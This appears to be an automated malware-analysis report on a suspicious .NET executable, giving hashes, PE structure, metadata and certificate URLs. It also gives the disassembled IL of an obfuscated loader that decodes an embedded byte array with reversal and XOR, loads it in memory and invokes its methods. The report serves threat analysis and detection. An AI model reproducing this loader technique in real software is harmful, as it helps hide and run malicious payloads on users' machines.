Suspicious
Suspect

7ffb3572cf07c5c9d51bd934b56b0ab2

PE Executable | MD5: 7ffb3572cf07c5c9d51bd934b56b0ab2 | Size: 2.4 MB | application/x-dosexec


Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
7ffb3572cf07c5c9d51bd934b56b0ab2
Sha1
cf7009f69eb3eb06961740b05ea3a55b5dc39fff
Sha256
7eb16b0b45dab6d07f6b00b20923751acc5313db25c978ee5f5c42317479af3b
Sha384
fdcc6f9d787910b8264e134c54c63da9b103da9bc6c715488385375eb7172efc7f0cd40673dd8c939ab68184d26a4e98
Sha512
e797a6ee668c0db4be03a21bb1f15fbf30ddef2a5607553e2babd5aafe29300ed0b45138c7b5cd8d7a3fd31f64930cb80d7d222244088a3e91c4290e3b466c14
SSDeep
49152:rPXSJg0byG/maCcSat+orzCpDt+w1x+VqVj:rPXsg0bSrczt+orOoVqJ
TLSH
B4B501223F9E2944C77AAF349DB7E6384BB25E4ADD29D35BA895304CAD3374913E0701

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
[Authenticode]_e71c699a.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0032
ID:0
ID:0-preview.png
ID:0033
ID:0
ID:0034
ID:0
ID:0035
ID:0
ID:0036
ID:0
ID:0037
ID:0
ID:0038
ID:0
ID:0039
ID:0
ID:003A
ID:0
RT_GROUP_CURSOR4
ID:0065
ID:0
RT_VERSION
ID:0001
ID:1033
.Net Resources
Ycj8j.Resources.resources
d8a04e21c6eedd.Resources.resources
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Info

Authenticode present at 0x246600 size 18264 bytes

Module Name

Ycj8j

Full Name

Ycj8j

EntryPoint

System.Void Ycj8j.2KmzLba7ox4AcM::3PobCar8()

Scope Name

Ycj8j

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Ycj8j

Assembly Version

1.9.2.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.6

Total Strings

981

Main Method

System.Void Ycj8j.2KmzLba7ox4AcM::3PobCar8()

Main IL Instruction Count

125

Main IL

nop <null> nop <null> ldc.i4.s 20 call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> call System.Byte[] Ycj8j.8eqJfD6a0wcQY2::9HtiBsj7() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stloc.0 <null> ldloc.0 <null> ldlen <null> conv.i4 <null> ldc.i4.1 <null> sub.ovf <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 br.s IL_0049: ldloc.s V_5 ldloc.s V_5 ldc.i4.8 <null> rem <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brfalse.s IL_0042: nop ldloc.0 <null> ldloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldelem.u1 <null> ldc.i4 211 xor <null> stelem.i1 <null> nop <null> nop <null> ldloc.s V_5 ldc.i4.1 <null> add.ovf <null> stloc.s V_5 ldloc.s V_5 ldloc.s V_4 ble.s IL_0026: ldloc.s V_5 ldloc.0 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.1 <null> ldloc.1 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() stloc.2 <null> ldloc.2 <null> ldlen <null> conv.i4 <null> ldc.i4.s 24 cgt <null> ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_006F: ldloc.2 leave.s IL_00EA: ret ldloc.2 <null> ldc.i4.s 24 ldelem.ref <null> stloc.3 <null> ldloc.3 <null> ldnull <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0080: ldloc.3 leave.s IL_00EA: ret ldloc.3 <null> ldc.i4.s 56 callvirt System.Reflection.MethodInfo[] System.Type::GetMethods(System.Reflection.BindingFlags) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_00CC: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.Reflection.ParameterInfo[] System.Reflection.MethodBase::GetParameters() ldlen <null> conv.i4 <null> ldc.i4.0 <null> ceq <null> stloc.s V_12 ldloc.s V_12 brfalse.s IL_00C4: nop nop <null> ldloc.s V_11 ldnull <null> ldnull <null> callvirt 
System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00C2: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00C2: nop nop <null> nop <null> nop <null> nop <null> ldloc.s V_10 ldc.i4.1 <null> add.ovf <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> clt <null> stloc.s V_13 ldloc.s V_13 brtrue.s IL_008F: ldloc.s V_9 leave.s IL_00E9: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E9: nop nop <null> ret <null>


Artefacts
Name
Value
URLs in VB Code - #1

https://certs.securetrust.com/CA0

URLs in VB Code - #2

http://crl.securetrust.com/TWGCSCA_L1.crl0y

URLs in VB Code - #3

http://ocsp.securetrust.com/0

URLs in VB Code - #4

http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0

URLs in VB Code - #5

https://ssl.trustwave.com/CA03

URLs in VB Code - #6

http://crl.trustwave.com/TWGCA.crl0n

URLs in VB Code - #7

http://ocsp.trustwave.com/06

URLs in VB Code - #8

http://ssl.trustwave.com/issuers/TWGCA.crt0

URLs in VB Code - #9

http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0

URLs in VB Code - #10

http://ocsp.vikingcloud.com/0A

URLs in VB Code - #11

http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0

URLs in VB Code - #12

https://certs.securetrust.com/CA05

URLs in VB Code - #13

http://crl.vikingcloud.com/TWGCA.crl0t

URLs in VB Code - #14

http://ocsp.vikingcloud.com/0

URLs in VB Code - #15

http://certs.securetrust.com/issuers/TWGCA.crt0
